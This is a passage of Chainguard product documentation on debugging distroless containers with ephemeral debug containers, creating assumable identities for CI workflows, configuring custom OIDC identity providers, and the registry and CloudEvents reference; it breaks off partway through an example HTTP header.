recommendation is to use the development variants to build the application and then copy all application artifacts into a distroless image, which will result in a final container image that has a minimal attack surface and won’t allow package installations or logins. That being said, it’s worth noting that the -dev variants of Chainguard Containers are still more secure than many popular container images based on fully-featured operating systems such as Debian and Ubuntu, because they carry less software, follow a more frequent patch cadence, and offer attestations for what is included. Language Ecosystem Guides The following guides show how to use these development images in combination with their distroless variants in order to build a final image that is also distroless, but contains everything the application needs to run: Getting Started with the Python Chainguard Container Getting Started with the Ruby Chainguard Container Getting Started with the Go Chainguard Container Getting Started with the Node Chainguard Container Getting Started with the PHP Chainguard Container Check also the guide on Creating Wolfi Container Images with Dockerfiles for guidance on how to build a custom image that can be used for development and debugging. 2. Using Ephemeral Debug Containers Another method to debug distroless images running in production is to use ephemeral debug containers, a special type of container that is temporarily attached to an existing Pod to troubleshoot and inspect running services. Suppose you have a Kubernetes cluster and one of the containers is having issues. Perhaps it doesn’t seem to be able to connect to other services in the cluster, or expected processes aren’t running. If the container has a shell, you’d be able to use kubectl exec to run debugging commands from inside the container to help diagnose the issue. With a minimal image, this isn’t possible, but we can achieve something very similar using kubectl debug to launch an ephemeral container. Let’s review an example. We’ll start by running a Chainguard NGINX image on a Kubernetes cluster: kubectl run nginx --image=cgr.dev/chainguard/nginx:latest Which should result in: pod/nginx created We can try to start a shell in this pod: kubectl exec -it nginx -- sh But the following error occurs: error: Internal error occurred: error executing command in container: failed to exec in container: failed to start exec "67bd5164394b1170ac1846bd77ea0b826332365970fbde3b3201bb9abec9b72c": OCI runtime exec failed: exec failed: unable to start container process: exec: "sh": executable file not found in $PATH: unknown Which is a long way of telling us there is no shell in the image. What we can do instead is use an ephemeral container. An ephemeral container will connect to the namespaces of an existing container, effectively allowing you to sideload debugging tools. Let’s try that now: kubectl debug -it nginx --image=cgr.dev/chainguard/wolfi-base --target=nginx You should get output similar to: Targeting container "nginx". If you don't see processes from this container it may be because the container runtime doesn't support this feature. Defaulting debug container name to debugger-87792. If you don't see a command prompt, try pressing enter. nginx:/# Now we can try running some debugging commands. Let’s start by seeing what’s running: nginx:/# ps aux PID USER TIME COMMAND 1 65532 0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf -e /dev/stderr 10 65532 0:00 nginx: worker process 11 65532 0:00 nginx: worker process 12 65532 0:00 nginx: worker process 13 65532 0:00 nginx: worker process 14 65532 0:00 nginx: worker process 15 65532 0:00 nginx: worker process 16 65532 0:00 nginx: worker process 23 root 0:00 /bin/sh -l 32 root 0:00 ps aux And the open ports: nginx:/# netstat -lntu Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN To facilitate accessing processes running in other containers without having to specify a target, you may enable process namespace sharing within your Pod setup. It’s also worth noting that the filesystem may not be accessible due to default user permissions. For more strategies on how to debug production distroless containers, check the Kubernetes documentation on debugging running Pods. Resources to Learn More Minimal Container Images: Towards a More Secure Future - Chainguard Blog Why Distroless - Chainguard Container Documentation Ephemeral Containers - Official Kubernetes Documentation Introducing Ephemeral Containers - Google Open Source Blog Talk: Running a Go Debugger in Kubernetes - Cloud Native Rejekts EU 23 --- ### Overview of Assumable Identities in Chainguard URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/assumable-ids/ Last Modified: May 9, 2024 Tags: Chainguard Containers, Product Both chainctl and the Chainguard Console are useful tools for interacting with Chainguard. However, there may be times that you want to hand off certain administrative tasks to an automation system, like Buildkite or GitHub Actions. In such cases, you can create a Chainguard identity for these systems to assume, allowing them to perform certain tasks within a specific scope. You can restrict access to an identity so that only workflows that present tokens matching a specific issuer and subject can assume it. Likewise, assumable identities can be tied to certain roles — like viewer, owner, or editor — letting you place strict limits on what a given identity is allowed to do. This guide provides a general overview of assumable identities in Chainguard, outlining how they work and how to create them. About Assumable Identities Chainguard’s assumable identities are identities that can be assumed by workflows in order to complete tasks without manual authorization. In many ways, these are similar to AWS roles or Google Service accounts, as Chainguard identities allow you to delegate access to your Chainguard resources to external applications or services. Chainguard originally only supported what are referred to as literal identities. These are identities that consist of a unique mapping of verified issuer and subject to refer to an individual user. Literal identities can work well for self-service enrollment in some cases. However, they start to run into problems in several scenarios, such as with systems that use variable subject claims (like Buildkite, which injects commit SHAs) or automation systems (like continuous integration systems), which can be difficult to register to literal identities on their first use. Assumable identities essentially reverse the lookup process of literal identities. Instead of Chainguard analyzing at a token’s issuer and subject to determine their literal identity, the client presents an assumable identity’s UIDP (unique identifier path). Chainguard then checks this UIDP against the client’s token. If the token’s issuer and subject match those required by the identity, then the client may assume the identity. This enables you to create identities that can only be assumed by specific automated workflows, providing greater security for your build and deployment processes. We have a number of examples of how to create assumable identities for specific providers. GitHub GitLab AWS Lambda Jenkins Buildkite Bitbucket A notable difference between registered users and identities in Chainguard’s IAM model is that identities are tied to a specific IAM organization. When you create an identity, you must specify a Chainguard organization under which the identity will be created. However, an identity won’t automatically have access to the other resources associated with that organization. In order for an identity to be able to interact with a organization’s resources — including the containers, repositories, and users associated with the organization — it must be granted the permissions it needs to do so. To do this, you must also tie the identity to a role. Chainguard comes with a few built-in roles, including viewer, editor, and owner. You can also create custom role-bindings with chainctl. Check out the chainctl iam role-bindings documentation for more details. Now that you have a better understanding of what assumable identities are, let’s go over how you can set up an assumable identity. There are currently two main ways you can create an identity: with Terraform and with chainctl. Let’s first go over how to set up an identity with Terraform. Terraform To set up an assumable identity with Terraform, you will need to add a few specific blocks to your Terraform configuration. The following example resource block is the most important of these, as it is what creates the assumable identity. resource "chainguard_identity" "<id-ref>" { parent_id = <chainguard organization ID> name = "<identity name>" description = <<EOF This is an example description for an identity. EOF claim_match { issuer = "https://some.issuer.uri.com" subject = "example-subject" } } Here, parent_id defines the Chainguard organization that the identity will be tied to. This could be a literal value — like a Chainguard organization identification number — or a local value that references an existing organization. You can enter whatever you’d like for the name, though it helps to provide a descriptive name for your identities. The description field is optional, but it can be helpful to include to clarify the identity’s purpose. The claim_match block within this section is what specifies the users and workloads allowed to assume the identity. You must specify an issuer and subject in the claim match block, but you can optionally specify an audience here as well. This example provides literal values for both the issuer and subject fields. This means that any workload or individual attempting to use this identity must have a signature whose issuer and subject match those within the claim_match block exactly. You can instead use the issuer_pattern, subject_pattern, or audience_pattern fields to pass regular expression patterns which clients must match in order to assume the identity. claim_match { issuer_pattern = ".*" subject_pattern = ".*" audience_pattern = ".*" } This gives you some more flexibility with defining who has access to the identity. Note that this example claim_match block would match any signature, meaning it would be so permissive as to be insecure. Another block to include in your Terraform configuration is an output block that outputs the UIDP of the identity you’re trying to assume. This is a unique value that you can use to let Chainguard know that you want to assume the role. output "<id-ref>-identity" { value = chainguard_identity.<id-ref>.id } The last two blocks you should include in a Terraform configuration are what apply a role-binding to the new identity. First, you need to include a data section to look up the role. In this example it looks up Chainguard’s built-in viewer role. data "chainguard_roles" "viewer" { name = "viewer" } Then you need to include another resource block to create the role-binding using the determined role. The identity will have the permissions of that role over the organization specified within this block. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.<id-ref>.id group = chainguard_group.user-group.id role = data.chainguard_roles.viewer.items[0].id } This means that the identity this Terraform configuration will create will only be able to view the resources tied to the same organization the identity is tied to. Applying this configuration will create the assumable identity. You can follow any of our identity examples to create an assumable identity that can be used by a continuous integration workflow to interact with Chainguard. The Terraform files used in the linked tutorials are based closely on the template outlined here. Managing identities with chainctl You can also set up an assumed identity using the chainctl command-line tool. Specifically, you can run the chainctl iam identities create subcommand, which uses the following syntax: chainctl iam identities create <identity-name> \ --identity-issuer=<issuer of the identity> \ --issuer-keys=<keys for the issuer> \ --subject=<subject of the identity> \ --group=<organization name> \ --role=<role> As with Terraform, you must provide chainctl with certain information about the identity you want to create, including the issuer and subject of the identity, the role-bindings associated with the identity (if any), and the organization under which the identity should be created. You can change an existing identity with the update command. The following example would update the identity’s issuer. chainctl iam identities update <identity-name> --identity-issuer=https://new-issuer.mycompany.com To delete an identity, use the delete subcommand. chainctl iam identities delete <identity-name> For more detailed information on managing identities with chainctl, we encourage you to check out the chainctl reference documentation. Assuming an identity Whether you create an identity with chainctl or with Terraform, Chainguard will generate a UIDP (unique identifier path) tied to the identity. You can retrieve a list of all the identities you’ve created — along with their UIDPs — with the following command. chainctl iam identities ls -o table ID | NAME | TYPE | DESCRIPTION | ROLES | ISSUER | EXPIRES ------------------------------------------------------------+----------------+-------------+-------------+-----------------------+---------------------------------------------+---------- c95870ebffa72a258df087ea727ee92daf177e29/f067a9080d45a098 | sampleidentity | claim_match | | example-group: viewer | https://token.actions.githubusercontent.com | n/a If a workflow is authorized to assume the identity — meaning that its token matches the issuer and subject specified for the identity — then it only needs to present this identification number in order to assume it. Learn More As mentioned previously, we’ve published a few tutorials that outline how you can set up an identity for a CI/CD workflow to assume. We strongly encourage you to follow these guides to better understand how assumable identities work in Chainguard. --- ### Create an Assumable Identity for a GitHub Actions Workflow URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/github-identity/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then create a GitHub Actions workflow that will assume the identity to interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. A GitHub repository you can use for testing out GitHub identity federation. To complete this guide, you must have permissions to create GitHub Actions on this testing repo. Creating Terraform Files We will be using Terraform to create an identity for a GitHub Actions workflow to assume. This step outlines how to create three Terraform configuration files that, together, will produce such an identity. To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/github-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. Next, you can create the sample.tf file. sample.tf sample.tf will create a couple of structures that will help us test out the identity in a workflow. This Terraform configuration consists of two main parts. The first part of the file will contain the following lines. data "chainguard_group" "group" { name = "my-customer.biz" } This section looks up a Chainguard IAM organization named my-customer.biz. This will contain the identity — which will be created by the actions.tf file — to access when we test it out later on. Now you can move on to creating the last of our Terraform configuration files, actions.tf. actions.tf The actions.tf file is what will actually create the identity for your GitHub Actions workflow to assume. The file will consist of four sections, which we’ll go over one by one. The first section creates the identity itself. resource "chainguard_identity" "actions" { parent_id = data.chainguard_group.group.id name = "github-actions" description = <<EOF This is an identity that authorizes the actions in this repository to assume to interact with chainctl. EOF claim_match { issuer = "https://token.actions.githubusercontent.com" subject = "repo:<github_orgName>/<github_repoName>:ref:refs/heads/main" } } First, this section creates a Chainguard Identity tied to the Chainguard Organization looked up in the sample.tf file. The identity is named github-actions and has a brief description. The most important part of this section is the claim_match. When the GitHub Actions workflow tries to assume this identity later on, it must present a token matching the issuer and subject specified here in order to do so. The issuer is the entity that creates the token, while the subject is the entity (here, the Actions workflow) that the token represents. In this case, the issuer field points to https://token.actions.githubusercontent.com, the issuer of OIDC tokens for GitHub Actions. The subject field, meanwhile, points to the main branch of an example GitHub repository. The GitHub documentation provides several examples of subject claims which you can refer to if you want to construct a subject claim specific to your needs. For the purposes of this guide, though, you will need to replace <github_orgName> and <github_repoName> with the name of your GitHub user or organization and the repository where your GitHub Actions workflow is hosted. The next section will output the new identity’s id value. This is a unique value that represents the identity itself. output "actions-identity" { value = chainguard_identity.actions.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.actions.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan Then apply the configuration. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. . . . Plan: 3 to add, 0 to change, 0 to destroy. Changes to Outputs: + actions-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After pressing ENTER, the command will complete and will output an actions-identity value. . . . Apply complete! Resources: 3 added, 0 changed, 0 destroyed. Outputs: actions-identity = "<your actions identity>" This is the identity’s UIDP (unique identity path), which you configured the actions.tf file to emit in the previous section. Note this value down, as you’ll need it to set up the GitHub Actions workflow you’ll use to test the identity. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls Note that you may receive a PermissionDenied error part way through the apply step. If so, run chainctl auth login once more, and then terraform apply again to resume creating the identity and resources. You’re now ready to create a GitHub Actions workflow which you’ll use to test out this identity. Creating and Testing a GitHub Actions Workflow To create a GitHub workflow, navigate to your repository in your browser and click the Actions tab. From there, find and click the New workflow button in the left-hand sidebar menu. Next, you’ll be prompted to choose a workflow template. Because this tutorial includes the exact code you’ll need for this workflow, you can skip this step by clicking the set up a workflow yourself ➔ link. You can name the workflow file whatever you like, although the default — main.yaml — will work for the purposes of this guide. In the Edit textbox, add the following. Be sure to replace <your actions identity> with the actions-identity value produced by the previous terraform apply command. name: Assume and Explore on: workflow_dispatch: {} jobs: assume-and-explore: name: actions assume example permissions: id-token: write runs-on: ubuntu-latest steps: - uses: chainguard-dev/setup-chainctl@main with: identity: <your actions identity> - run: | docker pull cgr.dev/<your organization>/example-image:latest This workflow is named actions assume example. The permissions block grants write permissions to the workflow for the id-token scope. Per the GitHub Actions documentation, you must grant this permission in order for the workflow to be able to fetch an OIDC token. This workflow performs two actions: First, it assumes the identity you just created with Terraform. Second, the workflow runs the docker pull command to pull an image from the organization’s Chainguard registry. Commit the workflow to your repository, then navigate back to the Actions tab. The Assume and Explore workflow will appear in the left-hand sidebar menu. Click on this, and then click the Run workflow button on the resulting page to execute the workflow. This indicates that the workflow can indeed assume the identity and interact with the organization. If you’d like to experiment further with this identity and what the workflow can do with it, there are a few parts of this setup that you can tweak. For instance, if you’d like to give this identity different permissions you can change the role data source to the role you would like to grant. data "chainguard_role" "editor" { name = "editor" } You can also edit the workflow itself to change its behavior. For example, instead of pulling an image, you could have the workflow list available repos: - run: chainctl images repos list Of course, the GitHub Actions workflow will only be able to perform certain actions on certain resources, depending on what kind of access you grant it. Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the role-binding, and the identity created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/github-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. Likewise, for more information on using GitHub Actions, we encourage you to check out the official documentation on the subject. --- ### Using Custom Identity Providers to Authenticate to Chainguard URL: https://edu.chainguard.dev/chainguard/administration/custom-idps/custom-idps/ Last Modified: January 7, 2025 Tags: Chainguard Containers, Overview The Chainguard platform supports Single Sign-on (SSO) authentication for users. By default, users can log in with GitHub, GitLab, and Google, but SSO support allows users to bring their own identity provider for authentication. This is helpful when your organization mandates using a corporate identity provider — like Okta or Azure Active Directory — to authenticate to SaaS products. Usage Once an administrator has configured an identity provider and set up their organization, users can authenticate at the command line and in the web console using the identity provider’s organization. Authenticate with chainctl chainctl, the Chainguard command line interface (CLI), supports SSO authentication by supplying the identity provider organization name as a flag or by setting it as a default in configuration. To use a flag to authenticate using SSO, pass the --identity-provider flag to chainctl auth login. export IDP_ID=<your identity provider id here> chainctl auth login --identity-provider=$IDP_ID You can retrieve all your identity provider’s unique IDs by running chainctl iam identity-providers list. Note that you can also use the --headless option to log in with a custom IDP in an environment that doesn’t have a browser installed, such as a container or a remote server. By including this option, chainctl will output a special URL. You can then navigate to the URL in another device’s browser to log in with your custom IDP. To log in with a custom IDP using the --headless option, you would run a command like the following: chainctl auth login --headless --identity-provider=$IDP_ID Then you can use the URL in this command’s output to complete the login flow from another device’s browser. Note: As of this writing (September 2024), using the headless login flow with a custom IDP is still an experimental feature. Please reach out to us through your customer success manager or the support portal to report any feedback. Also, until this feature becomes enabled by default, you must enable it yourself with the following command: chainctl config set auth.device-flow chainguard Setting a default identity provider As an alternative to remembering identity provider IDs, you can set the default identity provider by editing the chainctl configuration file. You can do so with the following command. chainctl config edit This will open your system’s default text editor where you can edit the local chainctl config. Add the following lines to this file. default: identity-provider: <your identity provider id here> Then save and close the file. If your system’s default editor is nano, for example, you can do so by pressing CTRL + X, Y, and then ENTER. You can also set this with a single command using the chainctl config set subcommand, as in this example. chainctl config set default.identity-provider <your identity provider id here> Once set, the configured identity provider will be used automatically any time you run chainctl auth login. Authenticate with chainctl using a Verified Organization If your organization is verified, you can use your organization name instead of the ID of your identity provider to authenticate. chainctl auth login --org-name example.com You can add your organization’s name to your chainctl config to make this a default setting. defaults:org-name:example.comTo learn more about working with your chainctl config, you can read our doc on How to Manage chainctl Configuration. Authenticate with the Chainguard Console To authenticate with the Chainguard Console, open the login screen. Then, select one of the following options: To use your organization’s SSO, enter your Organization or email address and click Continue. To use a third-party identity provider, click the corresponding option from the list. To use your email and a password, enter your email and click Continue. In each of these cases, you will be redirected to an external identity provider to authenticate and then returned to the Chainguard Console. If you are using your email and a password, authentication is handled by and credentials are stored with Auth0. Setup and Administration Chainguard SSO supports OpenID Connect (OIDC) compatible identity providers. In addition, identity providers must support the following: The authorization code grant type (sometimes called the authorization code flow). The standard openid, email, and profile scopes. Note that the Chainguard platform will partially function with only the openid scope, but full functionality requires the email and profile scopes as well. Customer-managed identity providers must also have a public, unauthenticated OIDC discovery endpoint. Typically, identity providers enable you to set up SSO by creating a specific resource on the provider’s platform. For example, Ping Identity requires you to add an application, while Okta has you create an app integration. To set up SSO for your identity provider, you must configure one of these resources to use OIDC so that the Chainguard platform can interact with the provider. Following that, you have to configure the Chainguard platform to use that application. Integration Guides for supported identity providers We have published guides for multiple platforms, including Okta and Ping Identity. If you aren’t using one of these identity providers, you can complete the following Generic Integration Guide to configure your provider to work with Chainguard. However, be aware that Chainguard does not actively support identity providers other than the ones listed previously. If you are using an alternate identity provider, we encourage you to contact us to learn more. Generic Integration Guide For a generic OIDC-compatible identity provider, start by creating an OIDC application. If possible, set as much metadata as possible for the application so that your users can identify this application as the Chainguard platform. The following assets and details can be helpful to include in the metadata: The Console homepage is console.chainguard.dev/ Our terms of service can be found at chainguard.dev/terms-of-service Our terms of use can be found at chainguard.dev/terms-of-use Our privacy policy is located at chainguard.dev/privacy-notice You can also add a Chainguard logo icon here to help your users visually identify this integration. The icon from the Chainguard Console will be suitable for most platforms Next, configure your OIDC application as follows: Set redirect URI to https://issuer.enforce.dev/oauth/callback Restrict grant types to authorization code only. It is critical that your application does not support “client credentials”, “device code”, “implicit” or other grant types (sometimes called “flows”) Restrict response types to only authorization codes (sometimes called just “code”) Enable “openid”, “email” and “profile” scopes for application Disable or set PKCE to optional Finally, configure a set of client credentials and make note of the following details to configure Chainguard: The issuer URL Client ID Client Secret Next, use chainctl to log in to Chainguard with an OIDC provider (such as Google, GitHub, or GitLab) to bootstrap your account. chainctl auth login The bootstrap account can use any supported IDP – for example you may choose to temporarily use a personal Google account. You can leave this account active as a backup account or, if you prefer, you can delete the account by removing the role-binding after configuring the custom IDP. Create a new identity provider using the details you noted from your OIDC application. Be sure to update the details in the following example export commands to align with your own application/client ID, client secret, and issuer URL. export NAME=my-sso-identity-provider export CLIENT_ID=<your application/client id here> export CLIENT_SECRET=<your client secret here> export ISSUER=<your issuer url here> export ORG=<your organization UIDP here> chainctl iam identity-provider create \ --configuration-type=OIDC \ --oidc-client-id=${CLIENT_ID} \ --oidc-client-secret=${CLIENT_SECRET} \ --oidc-issuer=${ISSUER} \ --oidc-additional-scopes=email \ --oidc-additional-scopes=profile \ --parent=${ORG} \ --default-role=viewer \ --name=${NAME} The oidc-issuer, oidc-client-id, and oidc-issuer-secret values are required when setting up an OIDC configuration with chainctl. You must also include a unique name for each custom IDP account. Be aware that if you don’t include the --parent or --default-role options in the command, you will be prompted to select these values interactively The --parent option specifies which Chainguard IAM organization your identity provider will be installed under. The --default-role option defines the default role granted to users registering with this identity provider. The previous example specifies the viewer role, but depending on your needs you might choose editor or owner. For more information, refer to the IAM and Security section. You can retrieve a list of all your Chainguard organizations — along with their UIDPs — with the following command. chainctl iam organizations ls -o table ID | NAME | DESCRIPTION --------------------------------------------------------+------------+--------------------- 59156e77fb23e1e5ebcb1bd9c5edae471dd85c43 | sample_org | . . . | . . . | Your organization selection won’t affect how your users authenticate but will have implications on who has permission to modify the SSO configuration. Managing Existing Identity Providers Identity providers can be managed via chainctl using the chainctl iam identity-provider subcommand. To create new providers, you can use the create subcommand. chainct iam identity-provider create To list out every configured identity provider, run the list subcommand. chainctl iam identity-provider list This will return a list of details for each of your identity providers, including their names and unique IDs. To modify an existing identity provider, use the update subcommand. chainctl iam identity-provider update This can be useful for rotating client credentials. Lastly, to delete an identity provider, run the delete subcommand. chainctl iam identity-provider delete For more details, check out the chainctl documentation for these commands. IAM and Security Once an identity provider has been created on the Chainguard platform, any user that can authenticate with that identity provider will be able to use it to access the Chainguard platform. It’s important to note that users can do so even if they have no IAM capabilities with the IAM organization at which the identity provider is defined. Identity providers give access to the Chainguard platform, but not the specific IAM organization where the identity provider is defined. The IAM capabilities identity_providers.create, identity_providers.update, identity_providers.list and identity_providers.delete control which users can read and manipulate identity providers. The built-in roles viewer, editor and owner have the following capabilities related to identity providers. Role Capabilities viewer identity_providers.list editor identity_providers.list owner identity_providers.create, identity_providers.list, identity_providers.update, identity_providers.delete Backup accounts In the case of an outage or misconfiguration of your identity provider, it can be helpful to have an authentication mechanism to the Chainguard platform outside of your SSO identity provider for recovery purposes. To this end, you can use one of our OIDC login providers (currently Google, GitHub, or GitLab) to create a backup account. As an OIDC login account needs to be set up to bootstrap the SSO identity provider initially, it’s possible to keep this account as a backup account in case you need it for recovery. However, the nature of these OIDC provider accounts is such that it is difficult to share them as a backup resource since they’re often tied to a single user. Instead of relying on an account with an OIDC login provider, you can alternatively set up an assumable identity to use as a backup account. Refer to our conceptual guide on assumable identities to learn more. --- ### Registry Overview URL: https://edu.chainguard.dev/chainguard/chainguard-registry/overview/ Last Modified: April 11, 2025 Tags: Chainguard Containers, Registry, Product Chainguard’s registry provides public access to all public Chainguard Containers, and provides customer access for image variants through login and authentication. While all public Chainguard Containers are freely available, logging in with a Chainguard account and authenticating when pulling from the registry provides a mechanism for Chainguard to contact you if there are any current or known upcoming issues with images you are pulling. If you would like to learn more about Chainguard Containers, you can review our documentation, and you can request further information through our inquiry form. Status You can check the status of Chainguard’s registry at https://status.cgr.dev. Network Requirements Refer to our Network Requirements reference page for details about how to ensure access to Chainguard’s registry in environments using firewalls, access control lists, and proxies. Using a Caching Proxy with Chainguard’s registry Chainguard does not offer an SLA for uptime for the Chainguard’s registry. In order to minimize production dependency on the Chainguard’s registry, we recommend that customers use a pull-through proxy for maximum reliability. We currently provide documentation on how you can set up a pull-through cache for the Chainguard’s registry on the following platforms: Google Artifact Registry JFrog Artifactory Sonatype Nexus Cloudsmith --- ### Chainguard Events URL: https://edu.chainguard.dev/chainguard/administration/cloudevents/events-reference/ Last Modified: June 30, 2025 Tags: Platform, Reference, Product Chainguard generates and emits CloudEvents based on actions that occur within a Chainguard account, such as registering a Kubernetes cluster or creating an IAM invitation. Chainguard also emits events when workloads or policies are changed in a cluster. Check out this GitHub repository for some sample applications that demonstrate how to use events to create Slack notifications, open GitHub issues, and mirror images. To subscribe to Chainguard events for your account, use the chainctl command like this: chainctl events subscriptions create –parent $YOUR_ORGANIZATION_OR_FOLDER https://<Your webhook URL> Once you are subscribed to Chainguard events, you will start receiving HTTP POST requests. Each request has a common set of CloudEvent header fields, denoted by the Ce- prefix. The event body is encoded using JSON and will have two top-level keys, actor and body. The actor field is the identity of the actor in your Chainguard account that triggered the event, such as a team member or a Kubernetes cluster. The body field contains the specific data about the event, for example the response status for an invite creation request, or a cluster delete request. UIDP Identifiers Each Chainguard event includes a Ce-Subject header that contains a UIDP (UID Path) identifier. Identifiers follow POSIX directory semantics and components are separated by / delimiters. A UIDP is comprised of: A globally unique identifier (UID), consisting of 20 bytes, that are URL safe hex encoded. For example, account identities like 0475f6baca584a8964a6bce6b74dbe78dd8805b6. One, or multiple / separated, scoped unique identifiers (SUID). An SUID is 8 bytes that are unique within a scope (like a group), and are URL safe hex encoded. The following is an example SUID: b74ce966caf448d1. SUIDs are used to identify every entity in Chainguard, from groups, policies, Kubernetes cluster IDs, event subscriptions, to IAM invitations, roles and role-bindings. Since Chainguard groups can contain child groups, events in a child group will propagate to the parent and thus the UIDP will contain multiple group SUIDs, along with the entity SUID itself. For example, assuming the following components: An account UID of 0475f6baca584a8964a6bce6b74dbe78dd8805b6 A group SUID of b74ce966caf448d1 A child of group b74ce966caf448d1 with its own SUID of dda9aab2d2d90f9e The complete UIDP in the event’s Ce-Subject header would be: 0475f6baca584a8964a6bce6b74dbe78dd8805b6/b74ce966caf448d1/dda9aab2d2d90f9e/1a4b29ca6df80013 Authorization Header Every Chainguard event has a JWT formatted OIDC ID token in its Authorization header. For authorization purposes, there are two important fields to validate: Use the iss field to ensure that the issuer is Chainguard, specifically https://issuer.enforce.dev. Use the sub field to check that the event matches your configured Chainguard identity. For example, assuming a UIDP ID of 0475f6baca584a8964a6bce6b74dbe78dd8805b6, the value will resemble the following: webhook:0475f6baca584a8964a6bce6b74dbe78dd8805b6. If the subscription is in a sub-group, then the value will have the corresponding group SUID appended to the path. Validating these fields before processing the JWT token using a verification library can save resources, as well as alert about suspicious traffic, or misconfigured Chainguard group settings. Events Reference The following list of services and methods show example HTTP headers and bodies for public facing Chainguard events. Service: Registry - Pull Method: Pulled Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: cgr.dev Ce-Specversion: 1.0 Ce-Subject: The identifier of the repository being pulled from Ce-Time: 2025-06-30T21:38:01.77840281Z Ce-Type: dev.chainguard.registry.pull.v1 Content-Length: 777 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "digest": "The digest of the image being pulled", "error": { "code": "The OCI distribution-spec error code", "message": "The error message", "status": 0 }, "location": "Location holds the detected approximate location of the client who pulled. For example, \"ColumbusOHUS\" or \"Minato City13JP", "method": "The method used to pull the image. One of: HEAD or GET", "remote_address": "", "repo_id": "The identifier of the repository being pulled from", "repository": "The identifier of the repository being pulled from", "tag": "The tag of the image being pulled", "type": "Type determines whether the object being pulled is a manifest or blob", "user_agent": "The user-agent of the client who pulled", "when": "2025-06-30T21:38:01.777462" } } Service: Registry - Push Method: Pushed Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: cgr.dev Ce-Specversion: 1.0 Ce-Subject: The identifier of the repository being pushed to Ce-Time: 2025-06-30T21:38:01.777663437Z Ce-Type: dev.chainguard.registry.push.v1 Content-Length: 707 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "digest": "The digest of the image being pushed", "error": { "code": "The OCI distribution-spec error code", "message": "The error message", "status": 0 }, "location": "Location holds the detected approximate location of the client who pushed. For example, \"ColumbusOHUS\" or \"Minato City13JP", "remote_address": "", "repo_id": "The identifier of the repository being pushed to", "repository": "The identifier of the repository being pushed to", "tag": "The tag of the image being pushed", "type": "Type determines whether the object being pushed is a manifest or blob", "user_agent": "The user-agent of the client who pushed", "when": "2025-06-30T21:38:01.777441" } } Service: auth - Auth Method: Register Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/auth/v1/register Ce-Specversion: 1.0 Ce-Subject: Chainguard UIDP Ce-Time: 2025-06-30T21:38:01.780370153Z Ce-Type: dev.chainguard.api.auth.registered.v1 Content-Length: 154 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "group": "the group this identity has joined by invitation", "identity": "Chainguard UIDP" } } Service: events - Subscriptions Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/events/v1/subscriptions Ce-Specversion: 1.0 Ce-Subject: UIDP identifier of the subscription Ce-Time: 2025-06-30T21:38:01.787603771Z Ce-Type: dev.chainguard.api.events.subscription.created.v1 Content-Length: 152 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP identifier of the subscription", "sink": "Webhook endpoint (http/https URL)" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: 